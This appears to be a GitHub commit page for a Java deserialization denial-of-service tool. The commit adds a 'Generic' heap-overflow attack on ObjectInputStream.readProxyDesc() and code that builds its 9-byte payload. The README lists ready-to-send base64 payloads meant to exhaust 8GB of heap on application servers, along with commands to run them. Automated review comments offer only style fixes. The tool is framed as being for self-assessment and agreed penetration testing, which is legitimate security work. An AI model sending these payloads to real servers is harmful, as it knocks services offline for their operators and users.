
Heap overflow attack on ObjectInputStream.readProxyDesc()

topolik committed Oct 21, 2016
1 parent 266a73b commit 0f38694a9453348252f2d9a918f86aa45e33d809
Showing with 28 additions and 4 deletions.
  1. +9 −2 README.md
  2. +17 −0 src/main/java/cz/topolik/OISDoS.java
  3. +2 −2 src/main/java/cz/topolik/oisdos/OISHeapOverflowAttack.java
@@ -6,14 +6,19 @@ Provided as-is, only for self-assessment, agreed pen-testing purposes, etc.
## Basic Scenarios
* Heap Dos using nested Object[], ArrayList and HashMap
* Generic Heap DoS inside ObjectInputStream
* Heap DoS using nested Object[], ArrayList and HashMap
* Collision attack on Hashtable
* Collision attack on HashMap (Oracle Java 1.7)
## Payloads for 8GB heap consumption
Should be enough to test the vulnerability in most app servers.
Generic (9 bytes):
rO0ABX1////3
Nested Object[] (44 bytes):
rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cH////c=
@@ -39,7 +44,9 @@ Nested HashMap (110 bytes):
E.g:
java -Xmx25g -jar target/oisdos-1.0.jar ObjectArrayHeap
java -Xmx25g -jar target/oisdos-1.0.jar Generic
java -Xmx25g -jar target/oisdos-1.0.jar ArrayListHeap
java -Xmx25g -jar target/oisdos-1.0.jar HashtableCollisions 5000
@@ -7,10 +7,12 @@
import org.apache.commons.codec.binary.Base64;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.EOFException;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.OptionalDataException;
import java.nio.ByteBuffer;
/**
@@ -28,6 +30,7 @@ public static void main(String[] args) throws Exception {
if (type == null) {
System.out.println("Syntax: OISDoS type [param]");
System.out.println("\t type");
System.out.println("\t\t ... Generic - Heap Overflow using proxyClassDesc interfaces number (fixed to 8GB)");
System.out.println("\t\t ... ObjectArrayHeap - Heap Overflow using Object[]");
System.out.println("\t\t ... ArrayListHeap - Heap Overflow using ArrayList");
System.out.println("\t\t ... HashMapHeap - Heap Overflow using HashMap");
@@ -42,6 +45,20 @@ public static void main(String[] args) throws Exception {
System.exit(1);
}
if ("Generic".equalsIgnoreCase(type)) {
byte[] payload = ByteBuffer.allocate(9)
.putShort((short) 0xACED) // STREAM_MAGIC
.putShort((short) 0x0005) // STREAM_VERSION
.put((byte)0x7D) // TC_PROXYCLASSDESC
.putInt(OISHeapOverflowAttack.MAX_ARRAY_SIZE).array();
System.out.print("Generating Generic heap overflow (8GB) using a payload of size ");
System.out.println(payload.length);
read(payload);
}
if ("ObjectArrayHeap".equalsIgnoreCase(type)) {
int heapSizeIn8Gigs = 1;
if (args.length > 1) {
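Review bot: The new `Generic` branch spells the stream header and type tag as bare literals (`0xACED`, `0x0005`, `0x7D`) annotated by comments, although java.io already publishes these exact values with the matching types as `ObjectStreamConstants.STREAM_MAGIC` (short), `ObjectStreamConstants.STREAM_VERSION` (short) and `ObjectStreamConstants.TC_PROXYCLASSDESC` (byte); using them removes the risk of comment and value drifting apart. Suggested lines: `.putShort(ObjectStreamConstants.STREAM_MAGIC)`, `.putShort(ObjectStreamConstants.STREAM_VERSION)`, `.put(ObjectStreamConstants.TC_PROXYCLASSDESC)` plus `import java.io.ObjectStreamConstants;` in the import block of the first hunk. The progress message hard-codes "(8GB)" while the size actually requested is whatever `OISHeapOverflowAttack.MAX_ARRAY_SIZE` resolves to, so the text presumably goes stale if that constant is ever changed; either compute the figure from the constant or drop the fixed parenthetical. main() starts before this hunk and continues past it.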
@@ -12,8 +12,8 @@
* @author Tomas Polesovsky
*/
public class OISHeapOverflowAttack {
private static final int MAX_ARRAY_SIZE;
private static final int MAXIMUM_CAPACITY;
public static final int MAX_ARRAY_SIZE;
public static final int MAXIMUM_CAPACITY;
private static final int OBJECT_ARRAY_SIZE_TEMP_VAL = 1234;
static {
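Review bot: `MAX_ARRAY_SIZE` and `MAXIMUM_CAPACITY` become public without any Javadoc, so a caller such as the new `Generic` branch in OISDoS has to read the static initializer to learn what each holds. A one-line Javadoc per field, e.g. `/** Value used by the payload generators as the array / interface-count limit; derived in the static initializer below. */`, with the precise wording taken from that initializer, would make the widened surface self-describing. The static block that assigns them starts on the hunk's last line and continues outside it, so what the values are cannot be confirmed from this hunk alone.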

